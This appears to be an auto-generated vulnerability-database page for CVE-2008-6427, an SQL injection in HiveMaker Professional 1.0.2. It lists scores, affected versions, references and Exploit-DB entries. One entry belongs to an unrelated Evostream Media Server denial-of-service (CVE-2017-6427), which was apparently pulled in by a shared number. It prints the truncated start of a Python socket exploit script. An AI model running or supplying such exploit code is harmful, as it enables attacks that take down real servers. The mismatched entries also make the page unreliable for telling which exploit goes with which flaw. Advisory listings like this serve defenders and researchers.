CVE-2008-6427
Published 2009-03-06
Priority P338 · medium · 6.8 · CVSS 2.0
AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS 1.65% · 73.6th percentile
SQL injection vulnerability in index.php in Hivemaker Professional 1.0.2 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the cid parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hivemaker | hivemaker | <= 1.0.2 | — |
No detection rules found.
Exploit-DB
Evostream Media Server 1.7.1 (x64) - Denial of Service
exploitdb·2017-03-07·CVSS 7.5
CVE-2017-6427 [HIGH] Evostream Media Server 1.7.1 (x64) - Denial of Service
---
# Exploit Title: Evostream Media Server 1.7.1 – Built-in Webserver DoS
# Date: 2017-03-07
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: https://evostream.com/software-downloads/
# Version: 1.7.1
# Tested on: Windows Server 2008 R2 Standard x64
# CVE : CVE-2017-6427
# 2017-03-02: Vulnerability reported
# 2017-03-03: Software vendor answered, vulnerability details shared
# 2017-03-07: No answer, publishing
import socket
import sys
try:
    host = sys.argv[1]
    port = 8080
except IndexError:
    print "[+] Usage %s " % sys.argv[0]
    sys.exit()
buffer = "GET /index.html HTTP/1.1\r\n"
buffer+= "Host: "+host+":"+str(port)+"\r\n"
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Geck
Exploit-DB
HiveMaker Directory 1.0.2 - 'cid' SQL Injection
exploitdb·2008-06-24
CVE-2008-6427 HiveMaker Directory 1.0.2 - 'cid' SQL Injection
---
proud to be muslim
rEm0te sql injction VulnErability
Hivemaker script
AuTh0r : security fears team
H0ME : WwW.alsonaa.CoM
members: HeB4RieH , germaya_x
Exploit-DB
HiveMaker Professional 1.0.2 - 'cid' SQL Injection
exploitdb·2008-05-30
CVE-2008-6427 HiveMaker Professional 1.0.2 - 'cid' SQL Injection
---
ECHO.OR.ID
ECHO_ADV_96$2008
[ECHO_ADV_96$2008] HiveMaker Professional <= 1.0.2 (cid) Sql Injection Vulnerability
Author : M.Hasran Addahroni
Date : May, 30 th 2008
Location : Jakarta, Indonesia
Web : http://e-rdc.org/v1/news.php?readmore=91
Critical Lvl : Medium
Impact : System access
Where : From Remote
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : HiveMaker Professional
version : <= 1.0.2
Vendor : http://www.hivemaker.com
Description :
Hivemaker is a website creation system written in PHP. Users can create websites without knowing any HTML in
No writeups or analysis indexed.
http://e-rdc.org/v1/news.php?readmore=91
http://osvdb.org/45916
http://secunia.com/advisories/30465
http://www.securityfocus.com/archive/1/492917/100/0/threaded
http://www.vupen.com/english/advisories/2008/1923/references
https://exchange.xforce.ibmcloud.com/vulnerabilities/42751
https://www.exploit-db.com/exploits/5698
https://www.exploit-db.com/exploits/5928
Published 2009-03-06